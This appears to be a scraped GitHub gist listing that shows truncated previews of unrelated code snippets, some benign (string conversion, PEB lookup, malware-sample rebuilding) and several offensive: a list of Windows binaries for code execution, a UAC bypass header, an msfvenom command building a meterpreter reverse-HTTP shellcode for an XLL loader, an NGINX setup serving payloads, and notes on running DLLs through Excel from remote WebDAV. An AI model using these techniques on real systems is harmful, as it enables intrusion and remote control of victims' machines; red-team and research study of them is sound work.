Wait, did I stream that out loud?

Aekr1_ //akrasia 0x25bit

enkomio / AssemblyAlternativeLoader.fs
Last active July 11, 2020 12:07
An alternative method to load an Assembly
open System
open System.Reflection
open System.IO
/// Use the private method GetTypeByNameUsingCARules in order to load the Assembly. This method will in turn use the internal
/// method: private static extern void GetTypeByNameUsingCARules(string name, RuntimeModule scope, ObjectHandleOnStack type);
let loadAssembly(filename: String, className: String, methodName: String, methodArguments: Object array) =
    let bindingFlags = BindingFlags.Static ||| BindingFlags.NonPublic ||| BindingFlags.Public ||| BindingFlags.Instance
    let assemblyName = AssemblyName.GetAssemblyName(Path.GetFullPath(filename))
    let fullName = String.Format("{0},{1}", className, assemblyName.FullName)
enkomio / Ploutus.D_rebuilder.fs
Last active May 28, 2024 21:19
This code extracts the real MSIL bytecode of the malware sample and rebuilds a new assembly
open System
open System.Linq
open System.Reflection
open System.Runtime.CompilerServices
open System.Collections
open System.Collections.Generic
open System.Diagnostics
open Microsoft.Diagnostics.Runtime
open dnlib.DotNet
open dnlib.DotNet.Emit
hasherezade / main.cpp
Last active September 12, 2024 05:53
Get PEB64 from a WOW64 process
#include <Windows.h>
#include <iostream>
#include "ntdll_undoc.h"
PPEB get_default_peb()
{
#if defined(_WIN64)
    return (PPEB)__readgsqword(0x60);
#else
zerhacken / cpp-stdwstring-to-stdstring.cpp
Last active August 1, 2019 04:05
std::wstring to std::string
#include <iostream>
#include <string>
#include <cassert>
#include <locale>
#include <codecvt>
trustedsec / gist:686057a1b8cdf3e580c57b211b263abe
Created November 2, 2017 15:11
List of applications for code execution via legit binaries
Rundll32.exe
Regsvr32.exe
Mshta.exe
Msbuild.exe
Cbd.exe
Csc.exe
Tracker.exe
Ntsd.exe
Bginfo.exe
Kd.exe
udaken / twstring.hpp
Last active June 12, 2023 04:20
Tiny String class for Win32 (licensed under The Unlicense)
#pragma once
#include <windows.h>
#include <Shlwapi.h>
#include <Strsafe.h>
#pragma comment(lib, "Shlwapi.lib")
#include <utility>
#include <cassert>
#include <cwchar>
#include <cstdint>
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
    BEGIN_INTERFACE
    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in ICMLuaUtil * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
jivoi / gist:a33ace2e25515a31aa2ffbae246d98c9
Created June 14, 2017 13:27
Serving Random Payloads with NGINX
# Serving Random Payloads with NGINX
# add set_random module https://github.com/openresty/set-misc-nginx-module#set_random
# edit file /etc/nginx/sites-enabled/default
set_random $uri 1 3;
map $uri $payloads {
    1 /payload.lnk;
    2 /payload.hta;
    3 /payload.exe;
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc